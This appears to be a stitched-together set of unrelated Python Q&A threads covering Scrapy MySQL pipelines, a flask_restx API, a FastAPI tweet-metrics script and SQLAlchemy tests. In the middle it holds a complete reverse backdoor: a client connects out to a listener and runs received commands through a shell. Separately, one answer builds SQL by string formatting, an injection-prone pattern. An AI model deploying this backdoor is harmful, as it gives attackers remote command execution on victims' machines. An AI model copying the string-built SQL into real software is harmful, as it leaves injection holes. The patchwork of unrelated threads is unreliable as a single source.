Writing items to a MySQL database in Scrapy - mysql

I am new to Scrapy and I have the following spider code:
class Example_spider(BaseSpider):
    name = "example"
    allowed_domains = ["www.example.com"]

    def start_requests(self):
        yield self.make_requests_from_url("http://www.example.com/bookstore/new")

    def parse(self, response):
        hxs = HtmlXPathSelector(response)
        urls = hxs.select('//div[@class="bookListingBookTitle"]/a/@href').extract()
        for i in urls:
            yield Request(urljoin("http://www.example.com/", i[1:]), callback=self.parse_url)

    def parse_url(self, response):
        hxs = HtmlXPathSelector(response)
        main = hxs.select('//div[@id="bookshelf-bg"]')
        items = []
        for i in main:
            item = Exampleitem()
            item['book_name'] = i.select('div[@class="slickwrap full"]/div[@id="bookstore_detail"]/div[@class="book_listing clearfix"]/div[@class="bookstore_right"]/div[@class="title_and_byline"]/p[@class="book_title"]/text()')[0].extract()
            item['price'] = i.select('div[@id="book-sidebar-modules"]/div[@class="add_to_cart_wrapper slickshadow"]/div[@class="panes"]/div[@class="pane clearfix"]/div[@class="inner"]/div[@class="add_to_cart 0"]/form/div[@class="line-item"]/div[@class="line-item-price"]/text()').extract()
            items.append(item)
        return items
And the pipeline code is:
class examplePipeline(object):
    def __init__(self):
        self.dbpool = adbapi.ConnectionPool('MySQLdb',
            db='blurb',
            user='root',
            passwd='redhat',
            cursorclass=MySQLdb.cursors.DictCursor,
            charset='utf8',
            use_unicode=True
        )

    def process_item(self, spider, item):
        # run db query in thread pool
        assert isinstance(item, Exampleitem)
        query = self.dbpool.runInteraction(self._conditional_insert, item)
        query.addErrback(self.handle_error)
        return item

    def _conditional_insert(self, tx, item):
        print "db connected-=========>"
        # create record if doesn't exist.
        tx.execute("select * from example_book_store where book_name = %s", (item['book_name']))
        result = tx.fetchone()
        if result:
            log.msg("Item already stored in db: %s" % item, level=log.DEBUG)
        else:
            tx.execute("""INSERT INTO example_book_store (book_name, price)
                          VALUES (%s, %s)""",
                       (item['book_name'], item['price'])
            )
            log.msg("Item stored in db: %s" % item, level=log.DEBUG)

    def handle_error(self, e):
        log.err(e)
After running this I get the following error:
exceptions.NameError: global name 'Exampleitem' is not defined
I get the above error when I add the line below to the process_item method:
assert isinstance(item, Exampleitem)
and without that line I get:
exceptions.TypeError: 'Example_spider' object is not subscriptable
Can anyone help me get this code running so that all the items are saved to the database?

Try the following code in your pipeline
import sys
import MySQLdb
import hashlib
from scrapy.exceptions import DropItem
from scrapy.http import Request

class MySQLStorePipeline(object):
    def __init__(self):
        self.conn = MySQLdb.connect('host', 'user', 'passwd',
                                    'dbname', charset="utf8",
                                    use_unicode=True)
        self.cursor = self.conn.cursor()

    def process_item(self, item, spider):
        try:
            self.cursor.execute("""INSERT INTO example_book_store (book_name, price)
                                   VALUES (%s, %s)""",
                                (item['book_name'].encode('utf-8'),
                                 item['price'].encode('utf-8')))
            self.conn.commit()
        except MySQLdb.Error, e:
            print "Error %d: %s" % (e.args[0], e.args[1])
        return item

Your process_item method should be declared as def process_item(self, item, spider): instead of def process_item(self, spider, item): you switched the arguments around.
This exception: exceptions.NameError: global name 'Exampleitem' is not defined indicates that you didn't import Exampleitem in your pipeline.
Try adding: from myspiders.myitems import Exampleitem (with the correct names/paths, of course).
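Putting both fixes together, the top of the pipeline would look roughly like this; the import path myspiders.myitems is just a placeholder for wherever your Exampleitem class actually lives:

# Hypothetical import path: point it at your project's items module.
from myspiders.myitems import Exampleitem

class examplePipeline(object):
    # ... __init__ and the other methods stay as they are ...

    def process_item(self, item, spider):  # item first, then spider
        assert isinstance(item, Exampleitem)
        query = self.dbpool.runInteraction(self._conditional_insert, item)
        query.addErrback(self.handle_error)
        return item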

I think this way is better and more concise:
# Item
class pictureItem(scrapy.Item):
    topic_id = scrapy.Field()
    url = scrapy.Field()

# SQL
self.save_picture = "insert into picture(`url`,`id`) values(%(url)s,%(id)s);"

# usage
cur.execute(self.save_picture, dict(item))
It's just like:
cur.execute("insert into picture(`url`,`id`) values(%(url)s,%(id)s)" % {"url": someurl, "id": 1})
Because (you can read more about Items in the Scrapy docs):
The Field class is just an alias to the built-in dict class and doesn’t provide any extra functionality or attributes. In other words, Field objects are plain-old Python dicts.
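To make that concrete, a minimal pipeline sketch built around this style could look like the snippet below; the connection details are placeholders, and the named placeholders in the SQL must match the item's field names so that dict(item) can fill them in:

import MySQLdb

class PicturePipeline(object):
    def __init__(self):
        # Placeholder connection details.
        self.conn = MySQLdb.connect('localhost', 'user', 'passwd', 'dbname',
                                    charset='utf8', use_unicode=True)
        self.cursor = self.conn.cursor()
        self.save_picture = "insert into picture(`url`,`id`) values(%(url)s,%(topic_id)s);"

    def process_item(self, item, spider):
        # dict(item) works because a scrapy.Item behaves like a plain dict.
        self.cursor.execute(self.save_picture, dict(item))
        self.conn.commit()
        return item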


Bizarre Environment-dependent Bad Request 400 error

I'm writing a program to convert a repository into a Docker container with an API based on some specification files. When I run the app in my MacBook's base environment, the computer-generated API works perfectly with both gunicorn and uwsgi. However, inside the miniconda-based Docker container it fails with Bad Request 400: The browser (or proxy) sent a request that this server could not understand. My goal is to eliminate this error. Obviously this has to do with the versions of some dependency or set of dependencies. Interestingly, the last endpoint in the API, which has a request parser within a namespace and no arguments, works perfectly, unlike the two other endpoints in the default namespace that do have arguments.
The API is built on flask_restx and uses reqparse.
The API code is here:
from flask_restx import Api, Resource, Namespace, reqparse, inputs
import flask
import process
from load_data import store_data

app = flask.Flask("restful_api")
api = Api(app, title="My API", description="This is an extremely useful API for performing tasks you would do with an API.", version="3.14")
data = {}
data.update(store_data())

class DefaultClass():
    def __init__(self):
        self.data = data

    def _replace_get(self, **args):
        default_args = {}
        args = {**default_args, **args}
        return process.replace(**args)

    def _find_get(self, **args):
        default_args = {"data": self.data["data"]}
        args = {**default_args, **args}
        return process.find_in_data_string(**args)

def set_up_worker():
    global defaultClass
    defaultClass = DefaultClass()

set_up_worker()

_replaceGetParser = reqparse.RequestParser()
_replaceGetParser.add_argument("txt",
                               type=str,
                               required=True,
                               help="Text to search ")
_replaceGetParser.add_argument("old",
                               type=str,
                               required=True,
                               help="Substring to replace ")
_replaceGetParser.add_argument("new",
                               type=str,
                               required=True,
                               help="Replacement for old ")
_replaceGetParser.add_argument("irrelevant_parameter",
                               type=int,
                               required=False,
                               default=5,
                               help="")
_replaceGetParser.add_argument("smart_casing",
                               type=inputs.boolean,
                               required=False,
                               default=True,
                               help="True if we should infer replacement capitalization from original casing. ")
_replaceGetParser.add_argument("case_sensitive",
                               type=inputs.boolean,
                               required=False,
                               default=True,
                               help="True if we should only replace case-sensitive matches ")

_findGetParser = reqparse.RequestParser()
_findGetParser.add_argument("window",
                            type=int,
                            required=False,
                            default=5,
                            help="Number of characters before and after first match to return ")
_findGetParser.add_argument("txt",
                            type=str,
                            required=False,
                            default="quick",
                            help="Your search term ")

@api.route('/replace', endpoint='replace', methods=['GET'])
@api.doc('defaultClass')
class ReplaceFrontend(Resource):
    @api.expect(_replaceGetParser)
    def get(self):
        args = _replaceGetParser.parse_args()
        return defaultClass._replace_get(**args)

@api.route('/find', endpoint='find', methods=['GET'])
@api.doc('defaultClass')
class FindFrontend(Resource):
    @api.expect(_findGetParser)
    def get(self):
        args = _findGetParser.parse_args()
        return defaultClass._find_get(**args)

retrievalNamespace = Namespace("retrieval", description="Data retrieval operations")

class RetrievalNamespaceClass():
    def __init__(self):
        self.data = data

    def _retrieval_retrieve_data_get(self, **args):
        default_args = {"data": self.data["data"]}
        args = {**default_args, **args}
        return process.return_data(**args)

def set_up_retrieval_worker():
    global retrievalNamespaceClass
    retrievalNamespaceClass = RetrievalNamespaceClass()

set_up_retrieval_worker()

_retrieval_retrieve_dataGetParser = reqparse.RequestParser()

@retrievalNamespace.route('/retrieval/retrieve_data', endpoint='retrieval/retrieve_data', methods=['GET'])
@retrievalNamespace.doc('retrievalNamespaceClass')
class Retrieval_retrieve_dataFrontend(Resource):
    @retrievalNamespace.expect(_retrieval_retrieve_dataGetParser)
    def get(self):
        args = _retrieval_retrieve_dataGetParser.parse_args()
        return retrievalNamespaceClass._retrieval_retrieve_data_get(**args)

api.add_namespace(retrievalNamespace)
I have had this problem with both pip-installed gunicorn and conda-installed uwsgi. I'm putting the file imported by the API at the end, since I think it is likely irrelevant what the function definitions are.
import numpy as np
import pandas as pd
import re
from subprocess import Popen, PIPE
from flask_restx import abort

def replace(txt: str = '',  # apireq
            old: str = '',  # apireq
            new: str = '',  # apireq
            case_sensitive: bool = True,
            smart_casing: bool = True,
            irrelevant_parameter: int = 5):
    """
    Search and replace within a string, as long as the string and replacement
    contain no four letter words.

    arguments:
        txt: Text to search
        old: Substring to replace
        new: Replacement for old
        case_sensitive: True if we should only replace case-sensitive matches
        smart_casing: True if we should infer replacement capitalization
            from original casing.

    return
        return value
    """
    four_letter_words = [re.match('[a-zA-Z]{4}$', word).string
                         for word in ('%s %s' % (txt, new)).split()
                         if re.match('[a-zA-Z]{4}$', word)]
    if four_letter_words:
        error_message = ('Server refuses to process four letter word(s) %s'
                         % ', '.join(four_letter_words[:5])
                         + (', etc' if len(four_letter_words) > 5 else ''))
        abort(403, custom=error_message)
    return_value = {}
    if not case_sensitive:
        return_value['output'] = txt.replace(old, new)
    else:
        lowered = txt.replace(old, old.lower())
        return_value['output'] = lowered.replace(old.lower(), new)
    return return_value

def find_in_data_string(txt: str = "quick",  # req
                        window: int = 5,
                        data=None):  # noapi
    """
    Check if there is a match for your search string in our extensive database,
    and return the position of the first match with the surrounding text.

    arguments:
        txt: Your search term
        data: The server's text data
        window: Number of characters before and after first match to return
    """
    return_value = {}
    if txt in data:
        idx = data.find(txt)
        min_idx = max(idx - window, 0)
        max_idx = min(idx + len(txt) + window, len(data) - 1)
        return_value['string_found'] = True
        return_value['position'] = idx
        return_value['surrounding_string'] = data[min_idx:max_idx]
        return_value['surrounding_string_indices'] = [min_idx, max_idx]
    else:
        return_value = {['string_found']: False}
    return return_value

def return_data(data=None):  # noapi
    """
    Return all the data in our text database.
    """
    with Popen(['which', 'aws'], shell=True, stdout=PIPE) as p:
        output = p.stdout.read()
    try:
        assert not output.strip()
    except AssertionError:
        abort(503, custom='The server is incorrectly configured.')
    return_value = {'data': data}
    return return_value
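For reference, a request that supplies the required arguments defined by _replaceGetParser would look roughly like this; the host and port are placeholders for wherever gunicorn or uwsgi is actually listening:

import requests

# txt, old and new are required by the parser; the boolean flags are optional.
params = {
    "txt": "hello there",
    "old": "there",
    "new": "world",
    "smart_casing": "true",
    "case_sensitive": "true",
}
response = requests.get("http://127.0.0.1:8000/replace", params=params)
print(response.status_code, response.json())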

Why isn't fastAPI making the database and returning the result here?

Long code ahead, kindly help out.
I am trying to create a points system for tweets. I have streamed tweets with #Python to a MySQL database and am now trying to build the points system on top of that data.
from typing_extensions import Self
import requests
import os
import json
import mysql.connector
from mysql.connector import Error

bearer_token = "$Bearer"

# Getting tweet ids of specified user from database
ids = []

class tweet_id:
    def __init__(self, name):
        self.name = name

    def get_tweet_ids(self, name):
        try:
            connection = mysql.connector.connect(host='localhost',
                                                 database='twitterdb',
                                                 user='root',
                                                 password='pasword#123')
            cursor = connection.cursor()
            sql_select_query = """SELECT tweetid FROM twitterdb.StreamData WHERE username = %s"""
            # set variable in query
            cursor.execute(sql_select_query, (name,))
            # fetch result
            record = cursor.fetchall()
            for row in record:
                ids.append(int(row[0]))
        except mysql.connector.Error as error:
            print("Failed to get record from MySQL table: {}".format(error))
        """finally:
            if connection.is_connected():
                cursor.close()
                connection.close()"""

def create_url():
    tweet_fields = "tweet.fields=public_metrics"
    converted_list = [str(element) for element in ids]
    id_list = ",".join(converted_list)
    url = "https://api.twitter.com/2/tweets?ids={}&{}".format(id_list, tweet_fields)
    return url

def bearer_oauth(r):
    """
    Method required by bearer token authentication.
    """
    r.headers["Authorization"] = f"Bearer {bearer_token}"
    return r

def connect_to_endpoint(url):
    response = requests.request("GET", url, auth=bearer_oauth)
    print(response.status_code)
    if response.status_code != 200:
        raise Exception(
            "Request returned an error: {} {} {}".format(
                response.status_code, response.text, ids
            )
        )
        return url
    return response.json()
def main():
    #def __init__(connect, append_to_database):
    #    Self.connect = connect
    #    Self.append_to_database = append_to_database

    def connect(tweetid, retweet_count, reply_count, like_count, quote_count):
        """
        connect to MySQL database and insert twitter data
        """
        try:
            con = mysql.connector.connect(host='localhost',
                                          database='twitterdb', user='root', password='pasword#123', charset='utf8')
            if con.is_connected():
                """
                Insert twitter data
                """
                cursor = con.cursor(buffered=True)
                # twitter, golf
                query = "INSERT INTO Metrics (tweetid,retweet_count,reply_count,like_count,quote_count) VALUES (%s, %s, %s, %s, %s)"
                cursor.execute(query, (tweetid, retweet_count, reply_count, like_count, quote_count))
                con.commit()
        except Error as e:
            print(e)
        cursor.close()
        con.close()
        return

    def append_to_database(json_response):
        # Loop through each tweet
        for tweet in json_response['data']:
            # Tweet ID
            tweetid = tweet['id']
            # Tweet metrics
            retweet_count = tweet['public_metrics']['retweet_count']
            reply_count = tweet['public_metrics']['reply_count']
            like_count = tweet['public_metrics']['like_count']
            quote_count = tweet['public_metrics']['quote_count']
            connect(tweetid, retweet_count, reply_count, like_count, quote_count)

    url = create_url()
    json_response = connect_to_endpoint(url)
    append_to_database(json_response)

# function for connecting and inserting to database
# Function to calculate sum of points and display it
class summer:
    like_points = 0
    reply_points = 0
    total_rts = 0
    rt_points = 0
    total = 0

    def sum_fun():
        try:
            con = mysql.connector.connect(host='localhost',
                                          database='twitterdb', user='root', password='pasword#123', charset='utf8')
            if con.is_connected():
                cursor = con.cursor(buffered=True)

                def sum_rts():
                    cursor.execute("SELECT SUM(retweet_count) FROM twitterdb.Metrics")
                    sum1 = cursor.fetchall()[0][0]
                    if sum1 is None:
                        return 0
                    else:
                        return int(sum1)

                def sum_replies():
                    cursor.execute("SELECT SUM(reply_count) FROM twitterdb.Metrics")
                    sum2 = cursor.fetchall()[0][0]
                    if sum2 is None:
                        return 0
                    else:
                        return int(sum2)

                def sum_likes():
                    cursor.execute("SELECT SUM(like_count) FROM twitterdb.Metrics")
                    sum3 = cursor.fetchall()[0][0]
                    if sum3 is None:
                        return 0
                    else:
                        return int(sum3)

                def sum_qts():
                    cursor.execute("SELECT SUM(quote_count) FROM twitterdb.Metrics")
                    sum4 = cursor.fetchall()[0][0]
                    if sum4 is None:
                        return 0
                    else:
                        return int(sum4)

                like_points = (20 * (sum_likes()))
                reply_points = (100 * (sum_replies()))
                total_rts = (sum_rts() + sum_qts())
                rt_points = (300 * total_rts)
                total = (like_points + reply_points + rt_points)
                return total
                #print("Like Points:", like_points)
                #print("Reply Points:", reply_points)
                #print("Retweet Points:", rt_points)
                #print("Total Points:", total)
                # print(points)
        except Error as e:
            print(e)
        cursor.close()
        con.close()

def clear():
    """
    connect to MySQL database and insert twitter data
    """
    try:
        con = mysql.connector.connect(host='localhost',
                                      database='twitterdb', user='root', password='Mysql#123', charset='utf8')
        if con.is_connected():
            cursor = con.cursor(buffered=True)
            cursor.execute("truncate table twitterdb.Metrics")
    except Error as e:
        print(e)
    #cursor.close()
    #con.close()
    return
Furthermore, I have created an API with FastAPI to trigger all the functionality in the above script and return the outputs (like_points, reply_points, rt_points and total). The API accepts a username via a POST request and triggers the script.
API code:
from fastapi import FastAPI
from pydantic import BaseModel
from metrics import tweet_id
from metrics import create_urls
from metrics import summer
import metrics
import uvicorn
from typing_extensions import Self

app = FastAPI()

class Username(BaseModel):
    username: str

@app.post('/Username')
def Username(Username: Username):
    username = Username.username
    tweets_list = tweet_id(username)
    tweets_list.get_tweet_ids(str(username))
    metrics.clear()
    metrics.main()
    points = summer.sum_fun()
    return {points.total}

if __name__ == "__main__":
    uvicorn.run("api:app", host="127.0.0.1", port=5000, log_level="info")
I am unable to get the output: even though the request completes, I get null as the result. Why is that happening? Also, I am very new to a lot of this, so code improvement suggestions and modifications are very welcome. Thank you.
You have commented out the return in your sum_fun() function:
total = (like_points + reply_points + rt_points)
#return total
#print("Like Points:", like_points)
That's why None is returned when sum_fun() is invoked.
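As a rough sketch of the fix, sum_fun() could return the computed values instead of only printing them, and the FastAPI route could pass that dict straight through; sum_fun_fixed and its arguments below are hypothetical stand-ins for the nested sum_* helpers:

def sum_fun_fixed(sum_likes, sum_replies, sum_rts, sum_qts):
    # Same point arithmetic as in the question, but the result is returned.
    like_points = 20 * sum_likes
    reply_points = 100 * sum_replies
    rt_points = 300 * (sum_rts + sum_qts)
    total = like_points + reply_points + rt_points
    return {
        "like_points": like_points,
        "reply_points": reply_points,
        "rt_points": rt_points,
        "total": total,
    }

print(sum_fun_fixed(sum_likes=3, sum_replies=1, sum_rts=2, sum_qts=0))
# {'like_points': 60, 'reply_points': 100, 'rt_points': 600, 'total': 760}

The FastAPI route can then simply do points = summer.sum_fun() and return points, instead of return {points.total}.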

I get the error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor against my real computer

I have python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        return self.reliable_recieve()

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print(result)

my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has Python 3 with the following code:
#!/usr/bin/env python
import socket, subprocess
import json

class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_recieve()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()

my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the title. I have tried to decode the json_data with the utf-8 argument, but the problem persists.
The listener works when I test it against my VM, but against my real PC it shows this error,
and if I decode my json_data it shows the error "Object of type bytes is not JSON serializable".
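For context, that message is what Python 3's json module raises when it is handed bytes, and subprocess.check_output returns bytes on Python 3; a quick illustration:

import json
import subprocess

output = subprocess.check_output("echo hello", shell=True)
print(type(output))  # <class 'bytes'> on Python 3

try:
    json.dumps(output)  # bytes are not JSON serializable
except TypeError as e:
    print(e)  # Object of type bytes is not JSON serializable

print(json.dumps(output.decode("utf-8")))  # decoding to str first works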

Pipeline doesn't write to MySQL but also gives no error

I've tried to implement this pipeline in my spider.
After installing the necessary dependencies I am able to run the spider without any errors, but for some reason it doesn't write to my database.
I'm pretty sure something is going wrong when connecting to the database: even when I enter a wrong password, I still don't get any error.
When the spider has scraped all the data, it takes a few minutes before it starts dumping the stats.
2017-08-31 13:17:12 [scrapy] INFO: Closing spider (finished)
2017-08-31 13:17:12 [scrapy] INFO: Stored csv feed (27 items) in: test.csv
2017-08-31 13:24:46 [scrapy] INFO: Dumping Scrapy stats:
Pipeline:
import MySQLdb.cursors
from twisted.enterprise import adbapi
from scrapy.xlib.pydispatch import dispatcher
from scrapy import signals
from scrapy.utils.project import get_project_settings
from scrapy import log

SETTINGS = {}
SETTINGS['DB_HOST'] = 'mysql.domain.com'
SETTINGS['DB_USER'] = 'username'
SETTINGS['DB_PASSWD'] = 'password'
SETTINGS['DB_PORT'] = 3306
SETTINGS['DB_DB'] = 'database_name'

class MySQLPipeline(object):
    @classmethod
    def from_crawler(cls, crawler):
        return cls(crawler.stats)

    def __init__(self, stats):
        print "init"
        # Instantiate DB
        self.dbpool = adbapi.ConnectionPool('MySQLdb',
            host=SETTINGS['DB_HOST'],
            user=SETTINGS['DB_USER'],
            passwd=SETTINGS['DB_PASSWD'],
            port=SETTINGS['DB_PORT'],
            db=SETTINGS['DB_DB'],
            charset='utf8',
            use_unicode=True,
            cursorclass=MySQLdb.cursors.DictCursor
        )
        self.stats = stats
        dispatcher.connect(self.spider_closed, signals.spider_closed)

    def spider_closed(self, spider):
        print "close"
        """ Cleanup function, called after crawing has finished to close open
        objects.
        Close ConnectionPool. """
        self.dbpool.close()

    def process_item(self, item, spider):
        print "process"
        query = self.dbpool.runInteraction(self._insert_record, item)
        query.addErrback(self._handle_error)
        return item

    def _insert_record(self, tx, item):
        print "insert"
        result = tx.execute(
            " INSERT INTO matches(type,home,away,home_score,away_score) VALUES (soccer,"+item["home"]+","+item["away"]+","+item["score"].explode("-")[0]+","+item["score"].explode("-")[1]+")"
        )
        if result > 0:
            self.stats.inc_value('database/items_added')

    def _handle_error(self, e):
        print "error"
        log.err(e)
Spider:
import scrapy
import dateparser
from crawling.items import KNVBItem

class KNVBspider(scrapy.Spider):
    name = "knvb"
    start_urls = [
        'http://www.knvb.nl/competities/eredivisie/uitslagen',
    ]
    custom_settings = {
        'ITEM_PIPELINES': {
            'crawling.pipelines.MySQLPipeline': 301,
        }
    }

    def parse(self, response):
        # www.knvb.nl/competities/eredivisie/uitslagen
        for row in response.xpath('//div[@class="table"]'):
            for div in row.xpath('./div[@class="row"]'):
                match = KNVBItem()
                match['home'] = div.xpath('./div[@class="value home"]/div[@class="team"]/text()').extract_first()
                match['away'] = div.xpath('./div[@class="value away"]/div[@class="team"]/text()').extract_first()
                match['score'] = div.xpath('./div[@class="value center"]/text()').extract_first()
                match['date'] = dateparser.parse(div.xpath('./preceding-sibling::div[@class="header"]/span/span/text()').extract_first(), languages=['nl']).strftime("%d-%m-%Y")
                yield match
If there are better pipelines available to do what I'm trying to achieve that'd be welcome as well. Thanks!
Update:
With the link provided in the accepted answer I eventually got to this function that's working (and thus solved my problem):
def process_item(self, item, spider):
    print "process"
    query = self.dbpool.runInteraction(self._insert_record, item)
    query.addErrback(self._handle_error)
    query.addBoth(lambda _: item)
    return query
Take a look at this for how to use adbapi with MySQL to save scraped items. Note the difference between your process_item and their process_item implementation: while you return the item immediately, they return the Deferred object produced by runInteraction, which returns the item upon its completion. I think this is the reason your _insert_record never gets called.
If you can see the insert in your output that's already a good sign.
I'd rewrite the insert function this way:
def _insert_record(self, tx, item):
    print "insert"
    raw_sql = "INSERT INTO matches(type,home,away,home_score,away_score) VALUES ('%s', '%s', '%s', '%s', '%s')"
    sql = raw_sql % ('soccer', item['home'], item['away'], item['score'].explode('-')[0], item['score'].explode('-')[1])
    print sql
    result = tx.execute(sql)
    if result > 0:
        self.stats.inc_value('database/items_added')
It allows you to debug the SQL you're using. In your version you're not wrapping the string values in quotes, which is a syntax error in MySQL.
I'm not sure about your last values (score) so I treated them as strings.
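As a side note, letting the driver bind the parameters is usually safer than building the SQL with % formatting, and it avoids the quoting problem entirely. A hedged sketch of the same insert inside the pipeline class, assuming the score splits on "-" (note that explode is PHP; the Python equivalent is str.split):

def _insert_record(self, tx, item):
    # The MySQLdb driver quotes and escapes the bound values itself.
    home_score, away_score = item['score'].split('-')
    tx.execute(
        "INSERT INTO matches(type, home, away, home_score, away_score) "
        "VALUES (%s, %s, %s, %s, %s)",
        ('soccer', item['home'], item['away'], home_score.strip(), away_score.strip())
    )
    self.stats.inc_value('database/items_added')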

SQLAlchemy session woes in unittest

I started using SQLAlchemy just a few days ago and right now I'm stuck with a problem that I hope anyone can shed some light on before I lose all my hair.
When I run a unittest, see the snippet below, only the first test in the sequence passes. The test testPhysicalPrint works just fine, but testRecordingItem fails with a NoResultFound exception - No row was found for one(). But if I remove testPhysicalPrint from the test class, then testRecordingItem works.
I assume that the problem has something to do with the session, but I can't really get a grip on it.
In case anyone wonders, the setup is as follows:
Python 3.1 (Ubuntu 10.04 package)
SQLAlchemy 0.7.2 (installed via easy_install)
PostgreSQL 8.4.8 (Ubuntu 10.04 package)
PsycoPG2 2.4.2 (installed via easy_install)
Example test:
class TestSchema(unittest.TestCase):

    test_items = [
        # Some parent class products
        PrintItem(key='p1', title='Possession', dimension='30x24'),
        PrintItem(key='p2', title='Andrzej Żuławski - a director', dimension='22x14'),
        DigitalItem(key='d1', title='Every Man His Own University', url='http://www.gutenberg.org/files/36955/36955-h/36955-h.htm'),
        DigitalItem(key='d2', title='City Ballads', url='http://www.gutenberg.org/files/36954/36954-h/36954-h.htm'),
    ]

    def testPrintItem(self):
        item = self.session.query(PrintItem).filter(PrintItem.key == 'p1').one()
        assert item.title == 'Possession', 'Title mismatch'

    def testDigitalItem(self):
        item2 = self.session.query(DigitalItem).filter(DigitalItem.key == 'd2').one()
        assert item2.title == 'City Ballads', 'Title mismatch'

    def setUp(self):
        Base.metadata.create_all()
        self.session = DBSession()
        self.session.add_all(self.test_items)
        self.session.commit()

    def tearDown(self):
        self.session.close()
        Base.metadata.drop_all()

if __name__ == '__main__':
    unittest.main()
UPDATE
Here is the working code snippet.
# -*- coding: utf-8 -*-
import time
import unittest

from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import *

Base = declarative_base()
engine = create_engine('sqlite:///testdb', echo=False)
DBSession = sessionmaker(bind=engine)

class ItemMixin(object):
    """
    Commons attributes for items, ie books, DVD:s...
    """
    __tablename__ = 'testitems'
    __table_args__ = {'extend_existing': True}

    id = Column(Integer, autoincrement=True, primary_key=True)
    key = Column(Unicode(16), unique=True, nullable=False)
    title = Column(UnicodeText, default=None)
    item_type = Column(Unicode(20), default=None)

    __mapper_args__ = {'polymorphic_on': item_type}

    def __init__(self, key, title=None):
        self.key = key
        self.title = title

class FooItem(Base, ItemMixin):
    foo = Column(UnicodeText, default=None)

    __mapper_args__ = {'polymorphic_identity': 'foo'}

    def __init__(self, foo=None, **kwargs):
        ItemMixin.__init__(self, **kwargs)
        self.foo = foo

class BarItem(Base, ItemMixin):
    bar = Column(UnicodeText, default=None)

    __mapper_args__ = {'polymorphic_identity': 'bar'}

    def __init__(self, bar=None, **kwargs):
        ItemMixin.__init__(self, **kwargs)
        self.bar = bar

# Tests
class TestSchema(unittest.TestCase):
    # Class variables
    is_setup = False
    session = None
    metadata = None

    test_items = [
        FooItem(key='f1', title='Possession', foo='Hello'),
        FooItem(key='f2', title='Andrzej Żuławsk', foo='World'),
        BarItem(key='b1', title='Wikipedia', bar='World'),
        BarItem(key='b2', title='City Ballads', bar='Hello'),
    ]

    def testFooItem(self):
        print ('Test Foo Item')
        item = self.__class__.session.query(FooItem).filter(FooItem.key == 'f1').first()
        assert item.title == 'Possession', 'Title mismatch'

    def testBarItem(self):
        print ('Test Bar Item')
        item = self.__class__.session.query(BarItem).filter(BarItem.key == 'b2').first()
        assert item.title == 'City Ballads', 'Title mismatch'

    def setUp(self):
        if not self.__class__.is_setup:
            self.__class__.session = DBSession()
            self.metadata = Base.metadata
            self.metadata.bind = engine
            self.metadata.drop_all()    # Drop table
            self.metadata.create_all()  # Create tables
            self.__class__.session.add_all(self.test_items)  # Add data
            self.__class__.session.commit()  # Commit
            self.__class__.is_setup = True

    def tearDown(self):
        if self.__class__.is_setup:
            self.__class__.session.close()

    # Just for Python >=2.7 or >=3.2
    @classmethod
    def setUpClass(cls):
        pass

    # Just for Python >=2.7 or >=3.2
    @classmethod
    def tearDownClass(cls):
        pass

if __name__ == '__main__':
    unittest.main()
The most likely reason for this behavior is that the data is not properly cleaned up between the tests. This explains why it works when you run only one test.
setUp is called before every test, and tearDown after every test.
Depending on what you would like to achieve, you have two options:
Create the data only once for all tests.
In this case, if you had Python 2.7+ or Python 3.2+, you could use the setUpClass and tearDownClass methods. In your case you can handle it with a boolean class variable that prevents the code you have in setUp from running more than once.
Re-create the data before every test.
In this case you need to make sure that in tearDown you delete all the data. This is what you are not doing right now, and I suspect that when the second test runs, the call to one() fails not because it does not find an object, but because it finds more than one object matching the criteria. A rough sketch of this option is shown below.
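A minimal sketch of option 2, reusing the names from the question (Base, DBSession, test_items, engine), so that every test starts from a freshly created and populated schema:

def setUp(self):
    Base.metadata.create_all(bind=engine)
    self.session = DBSession()
    self.session.add_all(self.test_items)
    self.session.commit()

def tearDown(self):
    # Undo anything still pending, close the session, then drop the tables
    # so the next setUp starts from an empty database.
    self.session.rollback()
    self.session.close()
    Base.metadata.drop_all(bind=engine)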
Check the output of this code to understand the call sequence:
import unittest

class TestSchema(unittest.TestCase):

    def testOne(self):
        print '==testOne'

    def testTwo(self):
        print '==testTwo'

    def setUp(self):
        print '>>setUp'

    def tearDown(self):
        print '<<tearDown'

    @classmethod
    def setUpClass(cls):
        print '>>setUpClass'

    @classmethod
    def tearDownClass(cls):
        print '<<tearDownClass'

if __name__ == '__main__':
    unittest.main()
Output:
>>setUp
==testOne
<<tearDown
>>setUp
==testTwo
<<tearDown
I have this as my tearDown method and it does work fine for my tests:
def tearDown(self):
    """Cleans up after each test case."""
    sqlalchemy.orm.clear_mappers()